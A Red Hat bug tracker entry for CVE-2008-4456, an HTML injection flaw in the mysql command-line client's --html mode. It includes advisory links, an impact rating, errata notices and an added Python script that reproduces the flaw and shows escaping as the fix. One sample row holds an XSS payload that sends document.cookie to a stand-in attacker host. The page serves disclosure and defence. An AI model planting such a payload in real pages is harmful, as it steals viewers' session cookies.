Bug 466518 (CVE-2008-4456)

Summary: CVE-2008-4456 mysql: mysql command line client XSS flaw
Product: [Other] Security Response
Reporter: Josh Bressers <bressers>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: low
Priority: low
Version: unspecified
CC: jlieskov, kreilly, kvolny, ldimaggi, patrickm, support, tgl, vdanen
Keywords: Security
Hardware: All
OS: Linux
URL: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4456
Doc Type: Bug Fix
Last Closed: 2013-04-24 04:20:50 UTC
Bug Depends On: 502169, 512255, 512257, 516803

Description Josh Bressers 2008-10-10 17:50:39 UTC
Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document.

http://www.securityfocus.com/archive/1/archive/1/496842/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/496877/100/0/threaded
http://www.henlich.de/it-security/mysql-command-line-client-html-injection-vulnerability
http://bugs.mysql.com/bug.php?id=27884
http://secunia.com/advisories/32072

Comment 2 Jan Lieskovsky 2009-05-14 17:21:32 UTC
The issue has been rated as having low security impact, as this can only be a security flaw when all following conditions are met:

1) A database contains untrusted third party data.
2) A site uses the mysql command line tool with the --html option.
3) The resulting HTML output is placed and viewed on a web site the attacker could use to launch a cross-site-scripting attack.
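
Added example, not code from this bug, from MySQL or from Red Hat: a stand-alone Python reproduction of the injection described in the Description and of the three conditions listed in Comment 2. The affected mysql client, run with --html, prints each result set as a <TABLE> with one <TR> per row and copies cell contents into the <TD> cells verbatim. render_html_unescaped() imitates that behaviour over a constructed result set whose "comment" column holds untrusted data, render_html_escaped() emits the same rows with every cell HTML-escaped (the standard mitigation for this class of flaw; this page does not say how the vendor patch is implemented, so that is an assumption), and foreign_tags() is the check a reviewer would run on the output before publishing it. The table layout is an approximation of the client's output, not a byte-exact copy.

```python
"""Added example: imitate mysql --html cell rendering, unescaped vs escaped.

Not code from the bug, from MySQL or from Red Hat.  The table markup is an
approximation of what the client prints, and the escaped variant is the
generic mitigation for HTML injection, not necessarily the vendor's patch.
"""
import html
import re

# Constructed sample data (condition 1 in Comment 2): the "comment" column
# holds third-party input, one row of which carries a script payload.
SAMPLE_COLUMNS = ["id", "comment"]
SAMPLE_ROWS = [
    (1, "looks fine"),
    (2, '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'),
    (3, 'plain "quoted" & <b>bold</b>'),
]


def _table(columns, rows, cell):
    """Build the <TABLE BORDER=1> skeleton, applying `cell` to every value."""
    out = ["<TABLE BORDER=1><TR>"
           + "".join(f"<TH>{cell(c)}</TH>" for c in columns) + "</TR>"]
    for row in rows:
        out.append("<TR>" + "".join(f"<TD>{cell(v)}</TD>" for v in row) + "</TR>")
    out.append("</TABLE>")
    return "\n".join(out)


def render_html_unescaped(columns, rows):
    """Imitate the affected client (condition 2: output produced with --html):
    cell values are written into the markup exactly as stored."""
    return _table(columns, rows, str)


def render_html_escaped(columns, rows):
    """Same layout, but '&', '<', '>', '"' and "'" in every cell are replaced
    by character references, so a cell can neither close its <TD> nor open
    a new element."""
    return _table(columns, rows, lambda v: html.escape(str(v), quote=True))


# Any tag that is not part of the table skeleton must have come from a cell.
_FOREIGN_TAG = re.compile(r"<(?!/?(?:TABLE|TR|TH|TD)\b)[^>]*>", re.IGNORECASE)


def foreign_tags(html_doc):
    """List tags in the rendered document that the renderer itself did not
    emit.  A non-empty result means a cell injected markup; if the page is
    then published (condition 3), that markup runs in every viewer's
    browser."""
    return [m.group(0) for m in _FOREIGN_TAG.finditer(html_doc)]


if __name__ == "__main__":
    vulnerable = render_html_unescaped(SAMPLE_COLUMNS, SAMPLE_ROWS)
    hardened = render_html_escaped(SAMPLE_COLUMNS, SAMPLE_ROWS)
    print("injected tags in unescaped output:", foreign_tags(vulnerable))
    print("injected tags in escaped output:  ", foreign_tags(hardened))
    print(hardened)
```

Running the script shows the unescaped rendering carrying the <script> and <b> elements straight from the database into the document, while the escaped rendering contains no tag other than the table skeleton. The same foreign_tags() check can be pointed at real mysql --html output captured to a file before it is copied to a web server.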

Comment 5 errata-xmlrpc 2009-09-02 09:45:30 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2009:1289 https://rhn.redhat.com/errata/RHSA-2009-1289.html

Comment 6 errata-xmlrpc 2009-09-02 12:10:03 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2009:1289 https://rhn.redhat.com/errata/RHSA-2009-1289.html

Comment 8 Vincent Danen 2009-09-04 21:18:37 UTC
This issue does affect Red Hat Enterprise Linux 3 and 4, however the Security Response Team has rated it as having low impact and may be addressed in a future update.

Comment 9 errata-xmlrpc 2009-09-23 21:39:01 UTC
This issue has been addressed in following products:

  Red Hat Web Application Stack for RHEL 5

Via RHSA-2009:1461 https://rhn.redhat.com/errata/RHSA-2009-1461.html

Comment 10 errata-xmlrpc 2010-02-16 16:27:44 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 4

Via RHSA-2010:0110 https://rhn.redhat.com/errata/RHSA-2010-0110.html